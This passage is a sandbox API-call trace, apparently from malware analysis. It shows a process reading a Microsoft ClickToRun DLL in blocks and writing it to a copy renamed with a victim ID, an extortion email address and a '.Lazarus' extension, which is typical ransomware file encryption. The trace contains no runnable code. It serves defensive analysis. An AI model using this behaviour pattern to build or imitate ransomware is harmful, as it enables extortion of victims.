lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0093.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0093.550] GetFileType (hFile=0x33c) returned 0x1 [0093.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0093.550] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0093.550] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0093.550] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0093.551] CloseHandle (hObject=0x33c) returned 1 [0093.551] AreFileApisANSI () returned 1 [0093.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x820e8 [0093.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0093.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0093.551] GetFileType (hFile=0x33c) returned 0x1 [0093.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0093.551] CloseHandle (hObject=0x33c) returned 1 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.553] AreFileApisANSI () returned 1 [0093.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0093.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0093.553] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0)) returned 1 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0093.553] AreFileApisANSI () returned 1 [0093.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0093.553] GetLastError () returned 0x0 [0093.553] SetLastError (dwErrCode=0x0) [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0093.553] GetLastError () returned 0x0 [0093.553] SetLastError (dwErrCode=0x0) [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0093.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a430 [0093.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0093.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0093.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0093.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0093.554] AreFileApisANSI () returned 1 [0093.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0093.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8b680 [0093.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b680, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0093.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0093.554] GetFileType (hFile=0x33c) returned 0x1 [0093.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0093.555] AreFileApisANSI () returned 1 [0093.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82dd8 [0093.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0093.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0093.555] GetFileType (hFile=0x418) returned 0x1 [0093.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.555] GetLastError () returned 0x0 [0093.555] SetLastError (dwErrCode=0x0) [0093.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.555] GetLastError () returned 0x0 [0093.555] SetLastError (dwErrCode=0x0) [0093.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0093.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0093.556] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0093.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0093.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0093.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0093.557] GetLastError () returned 0x0 [0093.557] SetLastError (dwErrCode=0x0) [0093.557] GetLastError () returned 0x0 [0093.558] SetLastError (dwErrCode=0x0) [0093.558] GetLastError () returned 0x0 [0093.558] SetLastError (dwErrCode=0x0) [0093.558] GetLastError () returned 0x0 [0093.558] SetLastError (dwErrCode=0x0) [0093.558] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.559] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.560] GetLastError () returned 0x0 [0093.560] SetLastError (dwErrCode=0x0) [0093.560] GetLastError () returned 0x0 [0093.560] SetLastError (dwErrCode=0x0) [0093.560] GetLastError () returned 0x0 [0093.560] SetLastError (dwErrCode=0x0) [0093.560] GetLastError () returned 0x0 [0093.561] SetLastError (dwErrCode=0x0) [0093.561] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.561] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.561] GetLastError () returned 0x0 [0093.561] SetLastError (dwErrCode=0x0) [0093.561] GetLastError () returned 0x0 [0093.561] SetLastError (dwErrCode=0x0) [0093.561] GetLastError () returned 0x0 [0093.561] SetLastError (dwErrCode=0x0) [0093.561] GetLastError () returned 0x0 [0093.561] SetLastError (dwErrCode=0x0) [0093.562] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.562] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.562] GetLastError () returned 0x0 [0093.562] SetLastError (dwErrCode=0x0) [0093.562] GetLastError () returned 0x0 [0093.562] SetLastError (dwErrCode=0x0) [0093.562] GetLastError () returned 0x0 [0093.562] SetLastError (dwErrCode=0x0) [0093.562] GetLastError () returned 0x0 [0093.562] SetLastError (dwErrCode=0x0) [0093.562] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.563] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.563] GetLastError () returned 0x0 [0093.563] SetLastError (dwErrCode=0x0) [0093.563] GetLastError () returned 0x0 [0093.563] SetLastError (dwErrCode=0x0) [0093.563] GetLastError () returned 0x0 [0093.563] SetLastError (dwErrCode=0x0) [0093.563] GetLastError () returned 0x0 [0093.563] SetLastError (dwErrCode=0x0) [0093.563] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.563] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.564] GetLastError () returned 0x0 [0093.564] SetLastError (dwErrCode=0x0) [0093.564] GetLastError () returned 0x0 [0093.564] SetLastError (dwErrCode=0x0) [0093.564] GetLastError () returned 0x0 [0093.564] SetLastError (dwErrCode=0x0) [0093.564] GetLastError () returned 0x0 [0093.564] SetLastError (dwErrCode=0x0) [0093.564] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.564] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.565] GetLastError () returned 0x0 [0093.565] SetLastError (dwErrCode=0x0) [0093.565] GetLastError () returned 0x0 [0093.565] SetLastError (dwErrCode=0x0) [0093.565] GetLastError () returned 0x0 [0093.565] SetLastError (dwErrCode=0x0) [0093.565] GetLastError () returned 0x0 [0093.565] SetLastError (dwErrCode=0x0) [0093.565] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.565] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.565] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.566] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.566] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.566] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.566] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.566] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.566] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.566] GetLastError () returned 0x0 [0093.566] SetLastError (dwErrCode=0x0) [0093.567] GetLastError () returned 0x0 [0093.567] SetLastError (dwErrCode=0x0) [0093.567] GetLastError () returned 0x0 [0093.567] SetLastError (dwErrCode=0x0) [0093.567] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.567] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.567] GetLastError () returned 0x0 [0093.567] SetLastError (dwErrCode=0x0) [0093.567] GetLastError () returned 0x0 [0093.567] SetLastError (dwErrCode=0x0) [0093.567] GetLastError () returned 0x0 [0093.567] SetLastError (dwErrCode=0x0) [0093.568] GetLastError () returned 0x0 [0093.568] SetLastError (dwErrCode=0x0) [0093.568] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.568] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.568] GetLastError () returned 0x0 [0093.568] SetLastError (dwErrCode=0x0) [0093.568] GetLastError () returned 0x0 [0093.568] SetLastError (dwErrCode=0x0) [0093.568] GetLastError () returned 0x0 [0093.568] SetLastError (dwErrCode=0x0) [0093.568] GetLastError () returned 0x0 [0093.568] SetLastError (dwErrCode=0x0) [0093.569] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.569] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.569] GetLastError () returned 0x0 [0093.569] SetLastError (dwErrCode=0x0) [0093.569] GetLastError () returned 0x0 [0093.569] SetLastError (dwErrCode=0x0) [0093.569] GetLastError () returned 0x0 [0093.569] SetLastError (dwErrCode=0x0) [0093.569] GetLastError () returned 0x0 [0093.569] SetLastError (dwErrCode=0x0) [0093.569] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.570] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.570] GetLastError () returned 0x0 [0093.570] SetLastError (dwErrCode=0x0) [0093.570] GetLastError () returned 0x0 [0093.570] SetLastError (dwErrCode=0x0) [0093.570] GetLastError () returned 0x0 [0093.570] SetLastError (dwErrCode=0x0) [0093.570] GetLastError () returned 0x0 [0093.570] SetLastError (dwErrCode=0x0) [0093.570] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.570] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.571] GetLastError () returned 0x0 [0093.571] SetLastError (dwErrCode=0x0) [0093.571] GetLastError () returned 0x0 [0093.571] SetLastError (dwErrCode=0x0) [0093.571] GetLastError () returned 0x0 [0093.571] SetLastError (dwErrCode=0x0) [0093.571] GetLastError () returned 0x0 [0093.571] SetLastError (dwErrCode=0x0) [0093.571] 